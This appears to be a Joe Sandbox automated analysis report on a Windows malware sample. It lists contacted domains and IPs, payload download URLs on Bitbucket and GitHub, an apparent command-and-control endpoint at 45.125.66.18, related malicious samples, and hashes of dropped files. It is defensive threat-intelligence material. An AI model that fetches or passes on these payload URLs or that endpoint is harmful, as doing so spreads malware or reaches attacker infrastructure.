http://bbuseruploads.s3.amazonaws.com | 0% | Avira URL Cloud | safe |
http://s3-w.us-east-1.amazonaws.com | 0% | Virustotal | | Browse
https://bitbucket.org/updated24/updated24/downloads/Updated11.12.exe | 0% | Avira URL Cloud | safe |
https://github.com/workhasf/kelm/raw/main/iconozave.exe | 0% | Avira URL Cloud | safe |
https://bitbucket.org | 1% | Virustotal | | Browse
http://bbuseruploads.s3.amazonaws.com | 3% | Virustotal | | Browse
https://github.com/workhasf/kelm/raw/main/iconozave.exe | 0% | Virustotal | | Browse
https://bitbucket.org/updated24/updated24/downloads/Updated11.12.exe | 1% | Virustotal | | Browse
https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; | 0% | Virustotal | | Browse

Name | IP | Active | Malicious | Antivirus Detection | Reputation
s3-w.us-east-1.amazonaws.com | 52.216.214.209 | true | false | | unknown
bitbucket.org | 185.166.143.48 | true | false | | unknown
github.com | 140.82.121.3 | true | false | | unknown
raw.githubusercontent.com | 185.199.111.133 | true | false | | unknown
httpbin.org | 34.194.69.213 | true | false | | unknown
bbuseruploads.s3.amazonaws.com | unknown | unknown | false | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://httpbin.org/get | false | URL Reputation: safe | unknown
https://45.125.66.18/api/receiver/recv | false | 3%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://raw.githubusercontent.com/workhasf/kelm/main/iconozave.exe | false | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://raw.githubusercontent.com/workhasf/kelm/main/yjsefceawd.json | false | Avira URL Cloud: safe | unknown
https://raw.githubusercontent.com/workhasf/kelm/main/nepipirusas.json | false | Avira URL Cloud: safe | unknown
https://bitbucket.org/updated24/updated24/downloads/Updated11.12.exe | false | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://github.com/workhasf/kelm/raw/main/iconozave.exe | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
https://bbuseruploads.s3.amazonaws.com | UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D84000.00000004.00000800.00020000.00000000.sdmp | false | 3%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://github.com | tfi0ts5v.qpg.exe, 00000003.00000002.2560453979.000000C00000E000.00000004.00001000.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://github.comgithubusercontent.com | tfi0ts5v.qpg.exe, 00000003.00000002.2560453979.000000C00000E000.00000004.00001000.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://bitbucket.org | UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D3C000.00000004.00000800.00020000.00000000.sdmp | false | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://web-security-reports.services.atlassian.com/csp-report/bb-website | UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D7A000.00000004.00000800.00020000.00000000.sdmp, UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D76000.00000004.00000800.00020000.00000000.sdmp, UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D3C000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://bitbucket.orgd | UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D3C000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ | UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D3C000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://45.125.66.18:443/api/receiver/recv | rapnewsa.exe, 00000014.00000002.2541747512.000000000168E000.00000004.00000020.00020000.00000000.sdmp | false | 3%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://dz8aopenkvv6s.cloudfront.net | UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D7A000.00000004.00000800.00020000.00000000.sdmp, UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D76000.00000004.00000800.00020000.00000000.sdmp, UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D3C000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://s3-w.us-east-1.amazonaws.comd | UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D84000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/workhasf/kelm/raw/main/iconozave.exeraw.githubusercontent.com66666666666666666666 | tfi0ts5v.qpg.exe, 00000003.00000002.2562357900.000000C00024E000.00000004.00001000.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://bbuseruploads.s3.amazonaws.comd | UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D84000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://remote-app-switcher.prod-east.frontend.public.atl-paas.net | UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D7A000.00000004.00000800.00020000.00000000.sdmp, UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D76000.00000004.00000800.00020000.00000000.sdmp, UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D3C000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://cdn.cookielaw.org/ | UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D7A000.00000004.00000800.00020000.00000000.sdmp, UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D76000.00000004.00000800.00020000.00000000.sdmp, UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D3C000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://bbuseruploads.s3.amazonaws.com/5b13bdbb-293e-4709-86cb-a1785eabdee3/downloads/f3e97ed3-319a- | UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D7A000.00000004.00000800.00020000.00000000.sdmp, UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D84000.00000004.00000800.00020000.00000000.sdmp | false | 4%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://aui-cdn.atlassian.com/ | UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D7A000.00000004.00000800.00020000.00000000.sdmp, UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D76000.00000004.00000800.00020000.00000000.sdmp, UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D3C000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; | UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D3C000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://remote-app-switcher.stg-east.frontend.public.atl-paas.net | UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D7A000.00000004.00000800.00020000.00000000.sdmp, UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D76000.00000004.00000800.00020000.00000000.sdmp, UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D3C000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://45.125.66.18/li | rapnewsa.exe, 00000014.00000002.2541747512.00000000016BB000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://s3-w.us-east-1.amazonaws.com | UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D84000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005CC1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://bitbucket.org | UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005CC1000.00000004.00000800.00020000.00000000.sdmp | false | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://github.com/workhasf/kelm/raw/main/iconozave.exeC: | tfi0ts5v.qpg.exe, 00000003.00000002.2561321553.000000C000108000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://bbuseruploads.s3.amazonaws.com | UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D84000.00000004.00000800.00020000.00000000.sdmp | false | 3%, Virustotal, Browse; Avira URL Cloud: safe | unknown

IP | Domain | Country | Flag | ASN | ASN Name | Malicious
185.166.143.48 | bitbucket.org | Germany | | 16509 | AMAZON-02US | false
34.194.69.213 | httpbin.org | United States | | 14618 | AMAZON-AESUS | false
140.82.121.3 | github.com | United States | | 36459 | GITHUBUS | false
52.216.214.209 | s3-w.us-east-1.amazonaws.com | United States | | 16509 | AMAZON-02US | false
185.199.111.133 | raw.githubusercontent.com | Netherlands | | 54113 | FASTLYUS | false
45.125.66.18 | unknown | Hong Kong | | 133398 | TELE-ASTeleAsiaLimitedHK | false

Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1499702
Start date and time:2024-08-27 12:54:16 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 9m 45s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:23
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:UBONg7lmVR.exe
renamed because original name is a hash value
Original Sample Name:e1653e127b026feeb94faf95ccc260c4b063e2e3bb4f1cc361a4f9d8e928ae6e.exe
Detection:MAL
Classification:mal75.evad.winEXE@26/32@5/6
EGA Information:
  • Successful, ratio: 66.7%
HCA Information:
  • Successful, ratio: 81%
  • Number of executed functions: 219
  • Number of non-executed functions: 12
Cookbook Comments:
  • Found application associated with file extension: .exe
  • Override analysis time to 240000 for current running targets taking high CPU consumption
  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe, svchost.exe
  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
  • Execution Graph export aborted for target tfi0ts5v.qpg.exe, PID 320 because it is empty
  • Not all processes where analyzed, report is missing behavior information
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtCreateKey calls found.
  • Report size getting too big, too many NtDeviceIoControlFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
  • Report size getting too big, too many NtReadVirtualMemory calls found.
  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Time | Type | Description
06:55:12 | API Interceptor | 10644065x Sleep call for process: UBONg7lmVR.exe modified
06:55:27 | API Interceptor | 102x Sleep call for process: powershell.exe modified
                                              • 140.82.121.4
                                              https://energyservices.org/Get hashmaliciousHTMLPhisherBrowse
                                              • 140.82.121.3
                                              http://chengduyiwokeji-haiwai.datasink.datasjourney.comGet hashmaliciousUnknownBrowse
                                              • 140.82.121.3
                                              ep_setup.exeGet hashmaliciousUnknownBrowse
                                              • 140.82.121.4
                                              SecuriteInfo.com.Trojan-PSW.Win32.Stealer.cifv.26324.32739.exeGet hashmaliciousPhemedrone StealerBrowse
                                              • 140.82.121.3
                                              s3-w.us-east-1.amazonaws.comNotificacon Documneto.vbsGet hashmaliciousUnknownBrowse
                                              • 54.231.130.97
                                              Mi_Documento.jsGet hashmaliciousAsyncRAT, DcRatBrowse
                                              • 52.216.44.89
                                              https://github.com/massgravel/Microsoft-Activation-ScriptsGet hashmaliciousUnknownBrowse
                                              • 52.216.169.27
                                              https://pentaleon.com/?sragyzsragyzGet hashmaliciousUnknownBrowse
                                              • 3.5.16.100
                                              sostener.vbsGet hashmaliciousRemcosBrowse
                                              • 3.5.29.127
                                              sostener.vbsGet hashmaliciousAsyncRATBrowse
                                              • 52.217.200.17
                                              sostener.vbsGet hashmaliciousRemcosBrowse
                                              • 3.5.28.42
                                              http://yathuchandran.github.io/Metamask.cloneGet hashmaliciousUnknownBrowse
                                              • 52.217.164.209
                                              http://web3linksync.pages.dev/Get hashmaliciousUnknownBrowse
                                              • 3.5.25.119
                                              https://email.mail.shpcfirm.com/c/eJxUk7uyur4CRp9Guzi5AaGwAARF9t7e8PKzcUJIJAoIgqA8_RmrM_-v_Va5Fq-qi06njHOLUYVAqpQBKEU24AwjQLhhKC4tm5BknE4VRYwzOpZTZGFKiGkwPM6mDEqk0oQrwyLCEBSbkJqJKVJBKEuxHOsphphChjGimEA0sRBOGGemaWAhCU9HFBZc55Mmq4TSz2IiHsU4n2ZtWzUj4oxwMMLBtcD9gCdKMzZRaXOXX2qEAym-p_OdW7zh0fgpleU-PKuk4XwTP-WVOJsCgbisZ1UZicMrudqnILjugcf7rh4yF1bzINM2TO51maW3f2azdXtwMl4GQGrZG0N7ivel723lLmw-4QWs3k9xrZ4CH6y_MI9k4PW9dy9uh-PBBmShV8sDOeGzPVs7dy6KLlLc29bqsZZdpKGOvYggr3yxrhHx0Aymrx59x89td7857nJv2HV4gcPO47jCj4Xrn56yQH7oM7mogYP-THjwryX0amv1l-Td6r6OeV5aLLILqxCBa77dY9T2-cqul7vNL1JZvNwm4rR3_PiMHs469F8980zf__fyRWonrMrkO1Q1zE7Cvv2hMjPmhdgmND1vAzfyz0IH-Vuud40fWDr_cS4P9pGbwzolWZ97Q1yHHvWOrhE9PzPkcX9nlgt83Gh0ur-Sn3Axd6_zUG3KXD5_X9H-aGMdtOcOz6XuhrvvoJ2Wm2WVGJvdp43vDZcIkJ_ZYJUZuxaxAodf7_1SSTy3FdbeYPImUNcRmY3LR6uVFrzVj_IrsyGwZEggYBkcAyoxAzaVFNiYMmFAiASH4yrnH_n84oKntmkxAUxKMKBcQMAVTAFPTBMzBUnC7PFzenvlWo4o_I-ijSzTS6uL_wdh2eNuiv8XAAD__xdyDpEGet hashmaliciousHTMLPhisherBrowse
                                              • 52.216.33.113
                                              Match, Associated Sample Name / URL, SHA 256, Detection, Threat Name, Link, Context
                                              AMAZON-AESUShttps://aka.ms/LearnAboutSenderIdentificationGet hashmaliciousHTMLPhisherBrowse
                                              • 54.90.52.195
                                              1feP5qTCl0.exeGet hashmaliciousUnknownBrowse
                                              • 34.194.69.213
                                              Money Fellows Signatures Consent Docs#122531(Revised).pdfGet hashmaliciousUnknownBrowse
                                              • 23.22.254.206
                                              https://n3ki6w9.r.ap-northeast-2.awstrack.me/L0/https:%2F%2Fet.sp-25.com%2Fe%2Fc%2FOTizp%3FreferCode=product_OT2211aaaaaaaaaa%26shortLink=aaaaa%26longLink=H4sIAAAAAAAAAAXBWxLAEAwAwBNFCFP0Np7DhzLC_bvbzln8IvKCeQSPsM-63EoeIs2BYXW8H9_IafdYUCotqyUCW00Co8wDzmUFkhJ58qVqo35jyZFkUwAAAA==%26ecSource=OT%26referId=8725724309822211/1/010c01918f3a3e79-f24b6623-ae8f-4f46-a748-e9746a6021e2-000000/4Oo6Bk-hd_o5oOs3lBvVzZAlIjU=173Get hashmaliciousUnknownBrowse
                                              • 54.165.190.241
                                              https://indd.adobe.com/view/9cfcac35-338b-4a63-bb28-60a870b890dbGet hashmaliciousHTMLPhisherBrowse
                                              • 23.22.254.206
                                              https://we.tl/t-RErWU1YgQSGet hashmaliciousUnknownBrowse
                                              • 34.202.209.143
                                              https://wavebrowser.co/Get hashmaliciousUnknownBrowse
                                              • 3.222.199.46
                                              http://stream.crichd.vip/update/sscricket.phpGet hashmaliciousUnknownBrowse
                                              • 34.232.140.51
                                              virus total.pdfGet hashmaliciousHTMLPhisherBrowse
                                              • 23.22.254.206
                                              CMB Monaco Signatures Consent Docs#299229(Revised).pdfGet hashmaliciousUnknownBrowse
                                              • 52.202.204.11
                                              AMAZON-02UShttps://aka.ms/LearnAboutSenderIdentificationGet hashmaliciousHTMLPhisherBrowse
                                              • 76.223.111.18
                                              https://n3ki6w9.r.ap-northeast-2.awstrack.me/L0/https:%2F%2Fet.sp-25.com%2Fe%2Fc%2FOTizp%3FreferCode=product_OT2211aaaaaaaaaa%26shortLink=aaaaa%26longLink=H4sIAAAAAAAAAAXBWxLAEAwAwBNFCFP0Np7DhzLC_bvbzln8IvKCeQSPsM-63EoeIs2BYXW8H9_IafdYUCotqyUCW00Co8wDzmUFkhJ58qVqo35jyZFkUwAAAA==%26ecSource=OT%26referId=8725724309822211/1/010c01918f3a3e79-f24b6623-ae8f-4f46-a748-e9746a6021e2-000000/4Oo6Bk-hd_o5oOs3lBvVzZAlIjU=173Get hashmaliciousUnknownBrowse
                                              • 52.79.158.223
                                              https://indd.adobe.com/view/9cfcac35-338b-4a63-bb28-60a870b890dbGet hashmaliciousHTMLPhisherBrowse
                                              • 18.245.46.74
                                              https://we.tl/t-RErWU1YgQSGet hashmaliciousUnknownBrowse
                                              • 18.245.46.98
                                              https://wavebrowser.co/Get hashmaliciousUnknownBrowse
                                              • 52.222.236.57
                                              http://ebay.to/3u2gAmeGet hashmaliciousUnknownBrowse
                                              • 34.252.40.201
                                              New Al Maktoum International Airport Enquiry Ref #2401249.exeGet hashmaliciousFormBookBrowse
                                              • 76.223.105.230
                                              http://stream.crichd.vip/update/sscricket.phpGet hashmaliciousUnknownBrowse
                                              • 3.122.190.9
                                              https://cisa2024.entegyapp.co.uk/Get hashmaliciousUnknownBrowse
                                              • 3.70.10.198
                                              Quotation-27-08-24.exeGet hashmaliciousFormBookBrowse
                                              • 13.248.169.48
                                              FASTLYUShttps://aka.ms/LearnAboutSenderIdentificationGet hashmaliciousHTMLPhisherBrowse
                                              • 151.101.65.44
                                              1feP5qTCl0.exeGet hashmaliciousUnknownBrowse
                                              • 185.199.109.133
                                              https://indd.adobe.com/view/9cfcac35-338b-4a63-bb28-60a870b890dbGet hashmaliciousHTMLPhisherBrowse
                                              • 151.101.66.137
                                              https://we.tl/t-RErWU1YgQSGet hashmaliciousUnknownBrowse
                                              • 199.232.188.84
                                              http://ebay.to/3u2gAmeGet hashmaliciousUnknownBrowse
                                              • 199.232.188.84
                                              https://github.com/angryip/ipscan/releases/download/3.9.1/ipscan-3.9.1-setup.exeGet hashmaliciousUnknownBrowse
                                              • 185.199.109.133
                                              http://stream.crichd.vip/update/sscricket.phpGet hashmaliciousUnknownBrowse
                                              • 151.101.129.229
                                              virus total.pdfGet hashmaliciousHTMLPhisherBrowse
                                              • 199.232.210.172
                                              Electronic_Receipt_ATT0001.htmGet hashmaliciousUnknownBrowse
                                              • 104.244.43.131
                                              https://messaging-security.comano.us/XdEtiQ3I4emJ5ZldQUWF3SmcwOEQ4cURsb24rSWYyY2loVzV5bktYMlpLSlVxalNnL1RabENaQmozTzkvS3FhK1Z5ZTJDZHlNa1VGbnJDL1g3ZHBLdXdYNUJJbXVhckp5RmFuam41SWhoR0tQUTVWSmNSeEdVdXp3ZmV3eksreWs4dlFnVTBqZG8xUDdFZU9sN1JGZUNtUGdHQnZsVVJLRHREbFNUQm54UWtMa3dmdFNwVENxQTRLaFh3PT0tLUd4TXFReTErSUVBOTZZdDQtLWFZbmE1c254RWIwVWNyTkhyVHN0TUE9PQ==?cid=2140479915Get hashmaliciousUnknownBrowse
                                              • 199.232.196.193
                                              GITHUBUS1feP5qTCl0.exeGet hashmaliciousUnknownBrowse
                                              • 140.82.121.3
                                              https://github.com/angryip/ipscan/releases/download/3.9.1/ipscan-3.9.1-setup.exeGet hashmaliciousUnknownBrowse
                                              • 140.82.121.4
                                              https://energyservices.org/Get hashmaliciousHTMLPhisherBrowse
                                              • 140.82.121.3
                                              https://slopeofhope.com/commentsys/lnk.php?u=https://haconsultores.com.mx/legend/maxwell/ldpzbsp/michaelm@umcu.org&c=E,1,A_Yp496oib_-f1w3pZp4Hud2rskHoBUUu9m1zLjByrw-OpNq6TJQE-QgWUsuKigOG1mWiTep0uj-kK8C5-LvX_Bqh-uGvKRKtcnVwRDbXNCSMFYS3grZceoYqs0,&typo=1Get hashmaliciousHTMLPhisherBrowse
                                              • 140.82.121.4
                                              https://github.com/massgravel/Microsoft-Activation-ScriptsGet hashmaliciousUnknownBrowse
                                              • 140.82.112.21
                                              https://energyservices.org/Get hashmaliciousHTMLPhisherBrowse
                                              • 140.82.121.3
                                              ep_setup.exeGet hashmaliciousUnknownBrowse
                                              • 140.82.121.4
                                              SecuriteInfo.com.Trojan-PSW.Win32.Stealer.cifv.26324.32739.exeGet hashmaliciousPhemedrone StealerBrowse
                                              • 140.82.121.3
                                              http://yathuchandran.github.io/Metamask.cloneGet hashmaliciousUnknownBrowse
                                              • 140.82.114.21
                                              http://web3linksync.pages.dev/Get hashmaliciousUnknownBrowse
                                              • 140.82.121.4
                                              Match, Associated Sample Name / URL, SHA 256, Detection, Threat Name, Link, Context
                                              72a589da586844d7f0818ce684948eea1feP5qTCl0.exeGet hashmaliciousUnknownBrowse
                                              • 45.125.66.18
                                              V6ZsDcgx4N.exeGet hashmaliciousUnknownBrowse
                                              • 45.125.66.18
                                              V6ZsDcgx4N.exeGet hashmaliciousUnknownBrowse
                                              • 45.125.66.18
                                              48DhuEoTcX.exeGet hashmaliciousMetasploit, MeterpreterBrowse
                                              • 45.125.66.18
                                              6863(1)2.exeGet hashmaliciousCobaltStrikeBrowse
                                              • 45.125.66.18
                                              20240730#U7cfb#U7edf#U5f02#U5e38#U62a5#U9519.exeGet hashmaliciousCobaltStrikeBrowse
                                              • 45.125.66.18
                                              LisectAVT_2403002B_116.exeGet hashmaliciousUnknownBrowse
                                              • 45.125.66.18
                                              LisectAVT_2403002B_116.exeGet hashmaliciousUnknownBrowse
                                              • 45.125.66.18
                                              LisectAVT_2403002B_312.dllGet hashmaliciousTrickbotBrowse
                                              • 45.125.66.18
                                              2new.dll.dllGet hashmaliciousCobaltStrikeBrowse
                                              • 45.125.66.18
                                              3b5074b1b5d032e5620f69f9f700ff0efile.exeGet hashmaliciousUnknownBrowse
                                              • 185.166.143.48
                                              • 52.216.214.209
                                              SecuriteInfo.com.Win32.CrypterX-gen.18599.19099.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 185.166.143.48
                                              • 52.216.214.209
                                              Setup.exeGet hashmaliciousUnknownBrowse
                                              • 185.166.143.48
                                              • 52.216.214.209
                                              Setup.exeGet hashmaliciousUnknownBrowse
                                              • 185.166.143.48
                                              • 52.216.214.209
                                              Nakliye belgeleri.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 185.166.143.48
                                              • 52.216.214.209
                                              file.exeGet hashmaliciousUnknownBrowse
                                              • 185.166.143.48
                                              • 52.216.214.209
                                              Request for Quotation.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 185.166.143.48
                                              • 52.216.214.209
                                              SecuriteInfo.com.Trojan.Locsyz.2.2D0.720.7591.31980.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 185.166.143.48
                                              • 52.216.214.209
                                              SOA-Al Daleel -Star Electromechanical.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 185.166.143.48
                                              • 52.216.214.209
                                              https://eagle-ageprotection.co.za/hlp41s/aGVsZW4ucmljaGFyZHNAdmlyZ2lubW9uZXkuY29tGet hashmaliciousUnknownBrowse
                                              • 185.166.143.48
                                              • 52.216.214.209
                                              Match, Associated Sample Name / URL, SHA 256, Detection, Threat Name, Link, Context
                                              C:\Reka\rapnewsa.exe1feP5qTCl0.exeGet hashmaliciousUnknownBrowse
                                                Process:C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe
                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):38912
                                                Entropy (8bit):5.972409904582663
                                                Encrypted:false
                                                SSDEEP:768:ZCMmeyIJkkZ7XPImohfdjm7MEW/kJ7S/DWJ3GTHvvM1zI:ZCFeySkkJgl2MEW/ozwXM1
                                                MD5:2D4E723C184D9403B078E53F2DE74A23
                                                SHA1:92FA5F8F346CB987F249BD41755C5AEDAF4C8646
                                                SHA-256:0A6BF0678BBD793E39A84DFB4C71D8B709D9E538288BF826C48B1BA899803BA4
                                                SHA-512:A8F5267AE7F465A65A46D6ABEAED0C7A910C349E708E4264CC68747EE26DB78D62B575DEDB2E64553C207B914BA240654930774954DFA7503C93393CFADCE9AD
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 16%
                                                • Antivirus: Virustotal, Detection: 24%, Browse
                                                Joe Sandbox View:
                                                • Filename: 1feP5qTCl0.exe, Detection: malicious, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................n...............n.....n....Rich..................PE..L...PS.f...............&............0.............@.......................................@.....................................................................X.......................................................p............................text............................... ..`.rdata..............................@..@.data...D...........................@....reloc..X...........................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:modified
                                                Size (bytes):64
                                                Entropy (8bit):0.34726597513537405
                                                Encrypted:false
                                                SSDEEP:3:Nlll:Nll
                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                Malicious:false
                                                Preview:@...e...........................................................
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
